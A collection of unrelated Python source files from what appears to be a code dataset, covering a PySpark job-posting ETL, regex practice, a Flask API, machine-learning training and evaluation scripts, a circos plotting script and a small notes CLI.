.withColumnRenamed("id", "job_id") \
.withColumn("created_date", current_date()) \
.select("job_requirements_key", "job_id", "job_requirements", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job_requirements", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_requirements")
# transformando la dimensión
df_dim = df_stg_jobposts.select("id", "job_requirements").distinct() \
.withColumnRenamed("id", "job_id") \
.withColumn("created_date", current_date()) \
.select("job_id", "job_requirements", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["job_id"] == df_act_dim["job_id"],"leftanti") \
.withColumn("job_requirements_key", expr("uuid()")) \
.select("job_requirements_key", "job_id", "job_requirements", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job_requirements", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job_requirements") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_requirements", mode="overwrite")
def load_dim_job_payment():
"""
proceso de carga de dim_job_payment
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
#DIM JOB PAYMENT
# transformando la dimensión
df_dim = df_stg_jobposts.select("payment_period", "currency", "salary_minimum", "salary_maximum").distinct() \
.withColumn("job_payment_key", expr("uuid()")) \
.select("job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum")\
.union(spark.createDataFrame([("-1","-","-", 0, 0)],
["job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum"]))\
.withColumn("created_date", current_date())
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_job_payment", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_payment")
# transformando la dimensión
df_dim = df_stg_jobposts.select("payment_period", "currency", "salary_minimum", "salary_maximum").distinct() \
.withColumn("created_date", current_date()) \
.select("payment_period", "currency", "salary_minimum", "salary_maximum", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, [df_dim["payment_period"] == df_act_dim["payment_period"],
df_dim["currency"] == df_act_dim["currency"],
df_dim["salary_minimum"] == df_act_dim["salary_minimum"],
df_dim["salary_maximum"] == df_act_dim["salary_maximum"]],"leftanti") \
.withColumn("job_payment_key", expr("uuid()")) \
.select("job_payment_key", "payment_period", "currency", "salary_minimum", "salary_maximum", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_job_payment", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_job_payment") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_job_payment", mode="overwrite")
def load_dim_experience_years():
"""
proceso de carga de load_dim_experience_years
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_jobposts = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/job_posts")
if loadType=="full":
#DIM JOB POST
# transformando la dimensión
df_dim = df_stg_jobposts.select("experience_years").distinct() \
.withColumn("experience_years_key", expr("uuid()")) \
.withColumn("created_date", current_date()) \
.withColumn("min_experience_years", regexp_extract("experience_years", "(\\d{1,2})" , 1 ))\
.select("experience_years_key", "min_experience_years", "experience_years", "created_date")
df_dim = df_dim.withColumn("min_experience_years", df_dim["min_experience_years"].cast(t.IntegerType()))
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_experience_years", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_experience_years")
# transformando la dimensión
df_dim = df_stg_jobposts.select("experience_years").distinct() \
.withColumn("created_date", current_date()) \
.withColumn("min_experience_years", regexp_extract("experience_years", "(\\d{1,2})" , 1 ))\
.select("min_experience_years", "experience_years", "created_date")
df_dim = df_dim.withColumn("min_experience_years", df_dim["min_experience_years"].cast(t.IntegerType()))
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, [df_dim["min_experience_years"] == df_act_dim["min_experience_years"],
df_dim["experience_years"] == df_act_dim["experience_years"]],"leftanti") \
.withColumn("experience_years_key", expr("uuid()")) \
.select("experience_years_key", "min_experience_years", "experience_years", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_experience_years", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_experience_years") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_experience_years", mode="overwrite")
def load_dim_applicant():
"""
carga de datos de dim_applicant
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_applicant = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/applications")
if loadType=="full":
#DIM APPLICANT
# transformando la dimensión
df_dim = df_stg_applicant.select("user_id").distinct() \
.withColumn("applicant_key", expr("uuid()")) \
.union(spark.createDataFrame([("-1","-1")],
["user_id", "applicant_key"]))\
.withColumn("created_date", current_date()) \
.select("applicant_key", "user_id", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_applicant", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_applicant")
# transformando la dimensión
df_dim = df_stg_benefits.select("user_id").distinct() \
.withColumn("created_date", current_date()) \
.select("user_id", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["user_id"] == df_act_dim["user_id"],"leftanti") \
.withColumn("applicant_key", expr("uuid()")) \
.select("applicant_key", "user_id", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_applicant", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_applicant") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_applicant", mode="overwrite")
def load_dim_skill():
"""
carga y transformación de datos de dim_skill
"""
config = configparser.ConfigParser()
config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
loadType = config.get('PARAM', 'LOADTYPE')
spark = create_spark_session()
# Lectura de datos de staging layer
df_stg_applicant = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/applicants_skills")
if loadType=="full":
#DIM SKILLS
# transformando la dimensión
df_dim = df_stg_applicant.select("name").distinct() \
.withColumn("skill_key", expr("uuid()")) \
.withColumnRenamed("name", "skill_name") \
.withColumn("created_date", current_date()) \
.select("skill_key", "skill_name", "created_date")
df_dim.show(5)
# carga dimensión
df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_skill", mode="overwrite")
else:
# Lectura de datos
df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_skill")
# transformando la dimensión
df_dim = df_stg_benefits.select("name").distinct() \
.withColumnRenamed("name", "skill_name") \
.withColumn("created_date", current_date()) \
.select("skill_name", "created_date")
# indentificando incremental de datos
df_delta_dim = df_dim.join(df_act_dim, df_dim["skill_name"] == df_act_dim["skill_name"],"leftanti") \
.withColumn("skill_key", expr("uuid()")) \
.select("skill_key", "skill_name", "created_date")
df_new_dim = df_act_dim.union(df_delta_dim)
df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_skill", mode="overwrite")
spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_skill") \
.repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_skill", mode="overwrite")
|
995,045 | 9a240a177e1fa883d87efebe9b246a9d6d524740 | '''
@author Sam
@date 2017-12-30
@des 第七章数据规整化:清理、转换、合并、重塑
这里主要练习字符串操作
pandas 有对复杂的模式匹配和文本操作的功能进行加强。
'''
import pandas as pd
import numpy as np
import re
val = 'ab, guido'
tmp = val.split(',')
print(val)
pieces = [x.strip() for x in val.split(',')]
print('================>我就是分隔线 1 <==============')
print(pieces)
f, s = pieces
print(f + '::' + s)
print('::'.join(pieces))
print('a' in pieces)
print('================>我就是分隔线 2 <==============')
print(val.index(','))
print(val.find(':'))
print(val.count(','))
print(val.replace(',', '::'))
print('================>我就是分隔线 3 <==============')
val = ' ad bu in morining hello '
val = [x.strip() for x in val.split(' ')]
tmp = [y for y in val if y != '']
print(val)
print(tmp)
print('================>我就是分隔线 3 <==============')
val = 'morning '
print(val.ljust(12, ':'))
print('================>我就是分隔线 4 <==============')
text = "foo bar\t baz \tqux"
print(re.split('\s+', text))
print('================>我就是分隔线 5 <==============')
regex = re.compile('\s+')
print(regex.split(text))
print(regex.findall(text))
print('================>我就是分隔线 5 <==============')
# http://blog.csdn.net/make164492212/article/details/51656638
pattern1 = '[A-Z0-9_-]+@[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+'
regex = re.compile(pattern1, flags=re.IGNORECASE)
text = """Dave Sian@163.com
Samqian163@gmail.com
Rob rob@gmail.com
Ryan ran@yahoo.com"""
print(regex.findall(text))
print('================>我就是分隔线 6 <==============')
m = regex.search(text)
print(m)
print(text[m.start():m.end()])
print('================>我就是分隔线 7 <==============')
print(regex.match(text))
print('================>我就是分隔线 8 <==============')
print(regex.sub('Replaced', text))
print('================>我就是分隔线 9 <==============')
pattern1 = '([A-Z0-9_-]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9_-]+)'
regex = re.compile(pattern1, flags=re.IGNORECASE)
m = regex.match('wem@awesomel.com')
print(m)
print(m.groups())
print(regex.findall(text))
print('================>我就是分隔线 10 <==============')
pattern1 = '([A-Z0-9 _-]+)@([a-zA-Z0-9_-]+)\.([a-zA-Z0-9_-]+)'
regex = re.compile(pattern1, flags=re.IGNORECASE)
print(regex.sub('Username: \0, Domain: \2, Suffix: \3', text))
print('================>我就是分隔线 11 <==============')
regex = re.compile("""
(?P<Username>[A-Za-z0-9_-]+)
@(?P<Domain>[a-zA-Z0-9_-]+)
\.(?P<suffix>[a-zA-Z0-9_-]+)""", flags=re.IGNORECASE | re.VERBOSE)
tmp = 'samqian163@163.com'
m = regex.match(tmp)
print(m.groupdict())
print('================>我就是分隔线 11 <==============')
data = {'Dave': 'Sian@163.com', 'Sam': 'qian163@gmail.com', 'Rob': 'rob@gmail.com', 'Ryan': 'ran@yahoo.com'}
pattern = '([A-Z0-9 _-]+)@([a-zA-Z0-9_-]+)\.([a-zA-Z0-9_-]+)'
data = pd.Series(data)
print(data)
print('================>我就是分隔线 12 <==============')
print(data.isnull())
print('================>我就是分隔线 13 <==============')
print(data.str.contains('gmail'))
print('================>我就是分隔线 14 <==============')
print(data.str.findall(pattern, flags=re.IGNORECASE))
print('================>我就是分隔线 15 <==============')
matches = data.str.match(pattern, flags=re.IGNORECASE)
print(matches)
print(matches[:2])
|
995,046 | 6b5bb0b30587517d7bfc13f52e26aa7146acc682 | z=lambda i,j,r:i**2+j**2<r**2
def checkio(R):
r=int(R)+1
x=y=0
for i in range(r):
for j in range(r):
if z(i,j,R):
y+=1
x+=z(i+1,j+1,R)
return[x*4,(y-x)*4]
f=lambda R,r,k:sum((i+k)**2+(j+k)**2<R**2 for i in range(r) for j in range(r))
def golf(R):
r=int(R)+1
return [4*f(R,r,1),4*(f(R,r,0)-f(R,r,1))]
if __name__ == '__main__':
assert checkio(2) == [4, 12], "N=2"
assert checkio(3) == [16, 20], "N=3"
assert checkio(2.1) == [4, 20], "N=2.1"
assert checkio(2.5) == [12, 20], "N=2.5" |
995,047 | 65f4a21ff358c4520f5e8c66ca9446c00fde4e94 | import requests
import sys
import io
from urllib import request
def login():
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8') # 改变标准输出的默认编码
# 登录后才能访问的网页
url = 'fakeurl'
# 浏览器登录后得到的cookie,也就是刚才复制的字符串
cookie_str = r''
# 把cookie字符串处理成字典,以便接下来使用
cookies = {}
for line in cookie_str.split(';'):
key, value = line.split('=', 1)
cookies[key] = value
req = request.Request(url)
req.add_header("cookie", cookie_str)
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')
resp = request.urlopen(req)
print(resp.read().decode("utf-8"))
if __name__ == "__main__":
login()
|
995,048 | b09919c93b02099e19c1086fae5729e656e22724 | #!/usr/bin/python
from flask import Flask, jsonify, request
app = Flask(__name__)
transactions = [
{
'transaction_id': 1,
'place_id': u'place_id',
'car': 'car',
'cost' : u'UAH',
'leave_before' :u'date',
'hourly_rate': u'rate',
'result': 'result'
}
]
places = [
{
'place_id': 1,
'car': [{'car_number': 'leave_before'}],
'hourly_rate': '10',
}
]
@app.route('/todo/api/v1.0/places', methods = ['GET'])
def get_places():
for place in places:
if request.json.get('place_id', '') == place['place_id']:
return jsonify( { 'place': place })
@app.route('/todo/api/v1.0/transact', methods = ['POST'])
def trasaction():
for place in places:
error_flag = False
if request.json.get('place_id', '') == place['place_id']:
transaction = {
'transaction_id': int(transactions[-1]['transaction_id']) + 1,
'place_id': request.json.get('place_id', ''),
'car_number': request.json.get('car', ''),
'leave_before': request.json.get('leave_before', ''),
'cost': request.json.get('cost', ''),
'hourly_rate': request.json.get('hourly_rate'),
'result': True
}
place['car'].append({request.json.get('car_number', ''): request.json.get('leave_before', ''),})
transactions.append(transaction)
error_flag = True
break
if(error_flag) :
return jsonify( { 'transaction': transaction } ), 201
else:
return jsonify( {'Error': 'Transaction is not successful! There is no such place in db. Try again.'})
if __name__ == '__main__':
app.run(debug = True) |
995,049 | 30f29976f16cf2caaaee895ac0408ad55136c090 | import os
import time
import json
import logging
import argparse
import sys
sys.path.append(os.path.join("libs", "soft"))
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import backend as K
from data import ContentVaeDataGenerator
from data import CollaborativeVAEDataGenerator
from pretrain_vae import get_content_vae
from train_vbae_soft import get_collabo_vae, infer_tstep
from evaluate import EvaluateModel
from evaluate import Recall_at_k, NDCG_at_k
def predict_and_evaluate():
### Parse the console arguments.
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", type=str,
help="specify the dataset for experiment")
parser.add_argument("--split", type=int,
help="specify the split of the dataset")
parser.add_argument("--batch_size", type=int, default=128,
help="specify the batch size prediction")
parser.add_argument("--model_root", type=str, default=None,
help="specify the trained model root (optional)")
parser.add_argument("--device" , type=str, default="0",
help="specify the visible GPU device")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.device
### Set up the tensorflow session.
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
K.set_session(sess)
### Fix the random seeds.
np.random.seed(98765)
tf.set_random_seed(98765)
### Get the test data generator for content vae
data_root = os.path.join("data", args.dataset, str(args.split))
if args.model_root:
model_root = args.model_root
else:
model_root = os.path.join("models", args.dataset, str(args.split), "vbae-soft")
params_path = os.path.join(model_root, "hyperparams.json")
with open(params_path, "r") as params_file:
params = json.load(params_file)
pretrain_params_path = os.path.join(model_root, "pretrain_hyperparams.json")
with open(pretrain_params_path, "r") as params_file:
pretrain_params = json.load(params_file)
tstep_test_gen = ContentVaeDataGenerator(
data_root = data_root, phase="test",
batch_size = 1000, joint=True,
shuffle=False
)
bstep_test_gen = CollaborativeVAEDataGenerator(
data_root = data_root, phase = "test",
batch_size = args.batch_size, joint=True,
shuffle=False
)
### Make sure the data order is aligned between two data generator
assert np.all(tstep_test_gen.user_ids==bstep_test_gen.user_ids)
### Build test model and load trained weights
collab_vae = get_collabo_vae(params, [None, bstep_test_gen.num_items])
collab_vae.load_weights(os.path.join(model_root, "best_bstep.model"))
collab_decoder = collab_vae.build_vbae_recon_bstep()
content_vae = get_content_vae(pretrain_params, tstep_test_gen.feature_dim)
content_vae.build_vbae_tstep(collab_decoder, 0).load_weights(os.path.join(model_root, "best_tstep.model"))
vbae_infer_tstep = content_vae.build_vbae_infer_tstep()
vbae_eval = collab_vae.build_vbae_eval()
bstep_test_gen.update_previous_tstep(infer_tstep(vbae_infer_tstep, tstep_test_gen.features.A))
### Evaluate and save the results
k4recalls = [20, 40]
k4ndcgs = [100]
recalls, NDCGs = [], []
for k in k4recalls:
recalls.append("{:.4f}".format(EvaluateModel(vbae_eval, bstep_test_gen, Recall_at_k, k=k)))
for k in k4ndcgs:
NDCGs.append("{:.4f}".format(EvaluateModel(vbae_eval, bstep_test_gen, NDCG_at_k, k=k)))
recall_table = pd.DataFrame({"k":k4recalls, "recalls":recalls}, columns=["k", "recalls"])
recall_table.to_csv(os.path.join(model_root, "recalls.csv"), index=False)
ndcg_table = pd.DataFrame({"k":k4ndcgs, "NDCGs": NDCGs}, columns=["k", "NDCGs"])
ndcg_table.to_csv(os.path.join(model_root, "NDCGs.csv"), index=False)
print("Done evaluation! Results saved to {}".format(model_root))
if __name__ == '__main__':
predict_and_evaluate() |
995,050 | 1920d963dad15b2d2a2b90416c808236efdf3c89 | import sys
import json
from dateutil.parser import parse
from datetime import datetime
import pandas as pd
from text_util import TextUtil
class BlogEntry(object):
"""Data class modeling a raw blog entry"""
def __init__(self, title, date, url, raw_text, source, crawl_url):
super(BlogEntry, self).__init__()
self.__title = title
if isinstance(date, datetime):
self.__date = date
else:
self.__date = parse(date)
self.__url = url
self.__raw_text = raw_text
self.__source = source
self.__crawl_url = crawl_url
def title(self):
return self.__title
def date(self):
return self.__date
def url(self):
return self.__url
def text(self):
return self.__raw_text
def source(self):
return self.__source
def crawl_url(self):
return self.__crawl_url
@staticmethod
def from_json_object(json_object):
title = TextUtil.unpack_list(json_object['title'])
date_string = TextUtil.unpack_list(json_object['timestamp'])
raw_text = TextUtil.unpack_list(json_object['raw_content'])
url = TextUtil.unpack_list(json_object['url'])
source = 'joy_the_baker'#TextUtil.to_utf8(json_object['source'])
crawl_url = url#TextUtil.to_utf8(json_object['crawl_url'])
return BlogEntry(title, date_string, url, raw_text, source, crawl_url)
class BlogEntryCollection(object):
"""Data class modeling a collection of BlogEntry elements"""
def __init__(self, entries):
super(BlogEntryCollection, self).__init__()
if not isinstance(entries, list):
raise ValueError("Entries is not a list")
self.__entries = entries
@staticmethod
def from_json_file(file_path):
json_object = json.load(open(file_path))
return BlogEntryCollection.from_json_object(json_object)
@staticmethod
def from_json_object(json_collection):
entries = []
for json_entry in json_collection:
try:
entry = BlogEntry.from_json_object(json_entry)
entries.append(entry)
except IndexError:
print "Failed to create an entry from JSON"
blog_entry_collection = BlogEntryCollection(entries)
errors = len(json_collection) - blog_entry_collection.size()
print "Parsed " + str(blog_entry_collection.size()) + " with " + str(errors) + " errors"
return blog_entry_collection
def size(self):
return len(self.__entries)
def to_dataframe(self):
data = {}
data['title'] = list()
data['timestamp'] = list()
data['url'] = list()
data['raw_content'] = list()
for entry in self:
data['title'].append(entry.title())
data['timestamp'].append(entry.date())
data['url'].append(entry.url())
data['raw_content'].append(entry.text())
data = pd.DataFrame.from_dict(data)
data['year'] = data['timestamp'].dt.year
data['month'] = data['timestamp'].dt.month
data['week'] = data['timestamp'].dt.week
return data
def __iter__(self):
for entry in self.__entries:
yield entry
# if __name__ == "__main__":
# collection = BlogEntryCollection.from_json_file(sys.argv[1])
# print collection.size()
# #for entry in collection:
# # print entry.title()
# print collection.to_dataframe()
|
995,051 | ee3bf8b20892a30fc3b93f7ed6b4ba082e9bda11 | __all__ = ['similar', 'distance']
import similar
import distance |
995,052 | 3cbb0c768a87da1d5d232c34f2710fc04d808680 | import numpy as np
import os
from skimage.transform import resize
from skimage.io import imread
IMG_SIZE = (299, 299, 3)
NUM_CLASSES = 50
class BatchIterator:
def __init__(self, filenames, directory, resize_shape, batch_size, train_gt):
self._filenames = filenames
self._directory = directory
self._resize_shape = resize_shape
self._batch_size = batch_size
self._train_gt = train_gt
def _get_image(self, index):
return imread(os.path.join(self._directory, self._filenames[index]))
def __iter__(self):
return self
def __next__(self):
random_indexes = np.random.permutation(len(self._filenames))[:self._batch_size]
batch_filenames = [self._filenames[index] for index in random_indexes]
labels = np.zeros((self._batch_size, NUM_CLASSES))
labels_indexes = np.array([
self._train_gt[filename]
for filename in batch_filenames
])
labels[np.arange(self._batch_size), labels_indexes] = 1
return np.array([
resize(self._get_image(index), self._resize_shape, mode='reflect')
for index in random_indexes
]), labels
class VerboseClallback:
def __init__(self, model, directory):
self._model = model
self._directory = directory
self._counter = 1
def set_model(self, model):
pass
def set_params(self, params):
pass
def on_train_begin(self, logs):
pass
def on_train_end(self, logs):
pass
def on_epoch_begin(self, epoch, logs):
pass
def on_epoch_end(self, epoch, logs):
print(
str(self._counter) +
') val_categorical_accuracy: '
+ str(logs['val_categorical_accuracy'])
)
self._counter += 1
def on_batch_begin(self, batch, logs):
pass
def on_batch_end(self, batch, logs):
pass
def get_model(file_name='birds_model.hdf5', image_shape=IMG_SIZE, regularization_lambda=1e-3):
from keras import regularizers
from keras.layers import Dense, Dropout
from keras.models import Model
new_model = not os.path.exists(file_name)
if new_model:
from keras.applications.xception import Xception
initial_model = Xception(
include_top=False, weights='imagenet',
input_shape=image_shape, pooling='avg'
)
last = initial_model.output
nn = Dense(
1024, activation='elu',
kernel_regularizer=regularizers.l2(regularization_lambda)
)(last)
nn = Dense(
1024, activation='elu',
kernel_regularizer=regularizers.l2(regularization_lambda)
)(nn)
prediction = Dense(
NUM_CLASSES, activation='softmax',
kernel_regularizer=regularizers.l2(regularization_lambda)
)(nn)
model = Model(initial_model.input, prediction)
for layer in initial_model.layers:
layer.trainable = False
else:
from keras.models import load_model
model = load_model(file_name)
return model
def train_classifier(train_gt, train_img_dir, fast_train, validation=0.3):
from keras.optimizers import Adam
from sklearn.model_selection import train_test_split
model = get_model()
model.compile(
loss='categorical_crossentropy',
optimizer=Adam(lr=1e-4, decay=1e-2),
metrics=['categorical_accuracy']
)
image_filenames = os.listdir(train_img_dir)
batch_size = 4
epochs = 1 if fast_train else 60
steps_per_epoch = 4 if fast_train else int(len(image_filenames) / batch_size)
model.fit_generator(
BatchIterator(image_filenames, train_img_dir, IMG_SIZE, batch_size, train_gt),
steps_per_epoch=steps_per_epoch, epochs=epochs
)
return model
def classify(model, test_img_dir):
result = {}
img_size=IMG_SIZE
batch_size = 8
filenames = os.listdir(test_img_dir)
for begin_index in range(0, len(filenames), batch_size):
current_filenames = [
filenames[index] for index in range(begin_index, min(begin_index + batch_size, len(filenames)))
]
test_images = np.array([
resize(imread(os.path.join(test_img_dir, filename)), img_size, mode='reflect')
for filename in current_filenames
])
answers = model.predict(test_images, batch_size=batch_size)
for filename, answer in zip(current_filenames, answers):
result[filename] = np.argmax(answer)
return result |
995,053 | 15b22cbe86b4b2397798a968afb7fc3a6082441d | #!/usr/bin/python3
# Author: Joseph Sevigny
# Date: Feb, 28th 2020
# Purpose: automatic construction of circos plot from gff, fasta, and bed file
# tested for circos v 0.69.3
import os
import shutil
import sys
import argparse
from Bio import SeqIO
# Parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
#OPTIONAL ARGUMENTS
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
# Circos installation stuff
parser.add_argument("--circos_dir", help="path to circos install", type=str, default="/home/genome/joseph7e/bin/circos-0.69-3/")
parser.add_argument("--circos", help="path to circos program", type=str, default="/home/genome/joseph7e/bin/circos-0.69-3/bin/circos")
# Output options
parser.add_argument("-o", "--outdir", help="directory name for output", type=str, default="circos-mitogenome/")
parser.add_argument("--force", help="force delete and rewrite output dir", action="store_true")
# Required positional arguments
parser.add_argument("fasta", help="FASTA file of mitochondrial genome")
parser.add_argument("gff", help="path to standard gff file associated with FASTA")
parser.add_argument("bed", help="""bed graph file, make with this
bedtools genomecov -ibam sorted_mapped.bam -g ../../reference_fastas/MDD02-FG02-Achotines-A1.fasta -bga > coverage_histogram.bedg
grep NODE_6_ coverage_histogram.bedg | sed 's/NODE_6_length_15196_cov_22.680403/MDD02-FG02-Achotines-A1/g' mito_contig_coverage.bedg | sed 's/\t/ /g' > mito_contig_coverage.bedg.fixed
""")
parser.add_argument("bed2", help="another bed graph file, make as above")
args = parser.parse_args()
if os.path.isdir(args.outdir):
if args.force:
print ("deleting old directory and making new one")
shutil.rmtree(args.outdir)
else:
print("Output directory already exists, please remove, use a new name, or force with --force")
sys.exit()
os.mkdir(args.outdir)
# construct circos input files
# construct karotype from fasta and gff
output_karyotype = open(args.outdir + 'karyotype.txt','w')
for seq_record in SeqIO.parse(args.fasta, "fasta"):
length = len(seq_record)
name = seq_record.id.split('_')[0]
name2 = seq_record.id
output_karyotype.writelines("chr - {} 1 0 {} {}\n".format(name, length, name2))
output_genes = open(args.outdir + 'genes_protein.txt', 'w')
output_tRNA = open(args.outdir + 'genes_trna.txt', 'w')
output_rRNA = open(args.outdir + 'genes_rrna.txt', 'w')
output_labels = open(args.outdir + 'gene_labels.txt', 'w')
saved_starts_and_stops = [] # ensure no overlapping bands
for line in open(args.gff):
# the following is based off of mitos2 gff files.
elements = line.rstrip().split('\t')
contig = elements[0].split('_')[0]
type = elements[2]
start = elements[3]
stop = elements[4]
gene = elements[-1].split('=')[-1]
for pairs in saved_starts_and_stops:
if int(start) >= pairs[0] and int(start) <= pairs[1]:
start = str(pairs[1] + 1)
if int(stop) >= pairs[0] and int(stop) <= pairs[1]:
stop = str(pairs[0] - 1)
saved_starts_and_stops.append([int(start), int(stop)])
if type == 'gene':
output_genes.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
elif type == 'tRNA':
output_tRNA.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
elif type == 'rRNA':
output_rRNA.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
output_labels.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
# write circos config file
output_config = open(args.outdir + 'config.txt', 'w')
output_config.writelines("""
# circos.conf
karyotype = karyotype.txt
<ideogram>
<spacing>
default = 0.005r
</spacing>
radius = 0.9r
thickness = 5p
fill = yes
</ideogram>
<highlights>
# the default value for z-depth and fill_color for all highlights
z = 0
fill_color = green
# the first set will be drawing from 0.6x 1x-25pixels of the ideogram
# radius and will be green (color by default)
<highlight>
file = genes_protein.txt
r0 = .95r
r1 = 1r
fill_color = dblue
stroke_color = black
stroke_thickness = 3p
</highlight>
<highlight>
file = genes_trna.txt
r0 = .95r
r1 = 1r
fill_color = black
stroke_color = black
stroke_thickness = 0.2
</highlight>
<highlight>
file = genes_rrna.txt
r0 = .95r
r1 = 1r
fill_color = red
stroke_color = black
stroke_thickness = 3p
</highlight>
</highlights>
########################################################## gene labels
<plots>
<plot>
type = text
color = black
file = gene_labels.txt
r0 = 1.01r
r1 = 1.01r+200p
link_dims = 0p,0,50p,0p,10p
link_thickness = 2p
link_color = red
label_size = 34p
label_font = condensed
padding = 0p
rpadding = 0p
</plot>
################################################################# bedg
<plot>
# construct the histogram based on bedg file.
type = histogram
file = {}
r1 = 0.73r
r0 = 0.54r
stroke_type = outline
thickness = 4
color = vdgrey
extend_bin = no
<backgrounds>
<background>
color = vvlgrey
</background>
</backgrounds>
<axes>
<axis>
spacing = 0.1r
color = lgrey
thickness = 2
</axis>
</axes>
############################################ bedg 2
</plot>
<plot>
# construct the histogram based on bedg file.
type = histogram
file = {}
r1 = 0.94r
r0 = 0.75r
# min = 0
# max = 5000
stroke_type = outline
thickness = 4
color = dgreen
extend_bin = no
<backgrounds>
<background>
color = vvlgrey
</background>
</backgrounds>
<axes>
<axis>
spacing = 0.1r
color = lgrey
thickness = 2
</axis>
</axes>
</plot>
</plots>
################################################################
# The remaining content is standard and required.

# RGB/HSV color definitions, color lists, location of fonts, fill patterns.
# Included from Circos distribution.
<<include etc/colors_fonts_patterns.conf>>
# Debugging, I/O an dother system parameters
# Included from Circos distribution.
<<include etc/housekeeping.conf>>
""".format(args.bed, args.bed2))
# run circos
|
995,054 | f08492a27f89357815f1a35217ad986620ec7cb9 | from plumbum import cli, colors, local
import os
path = "/home/mattia/.notes/"
if not os.path.exists(path):
os.makedirs(path)
file = path + "notes.txt"
class Notes(cli.Application):
"simple notes handler"
PROGNAME = "Notes"
VERSION = "0.2"
def main(self):
if not self.nested_command:
print("No command given")
return 1
@Notes.subcommand("add")
class add(cli.Application):
"add a note given a string of character"
priority = cli.Flag( ["p","prioritize"],
help = "if given, it will add a danger mark to the note")
def main(self, *toadd: str):
nota = " ".join(toadd)
if not os.path.exists(file):
f = open(file,"w+")
f = open(file,"a")
f.write("[ ] " + nota +"\n")
elif self.priority :
f = open(file,"a")
danger = colors.yellow | "\u26A0"
f.write("[ ] " + nota + " " + danger +"\n")
else :
f = open(file,"a")
f.write("[ ] " + nota + "\n")
@Notes.subcommand("show")
class show(cli.Application):
"show the notes file"
def main(self):
if not os.path.exists(file):
print("no notes.txt file found, try the option 'add' to write a new one")
else :
a = open(file,"r").read()
print(a,end = "")
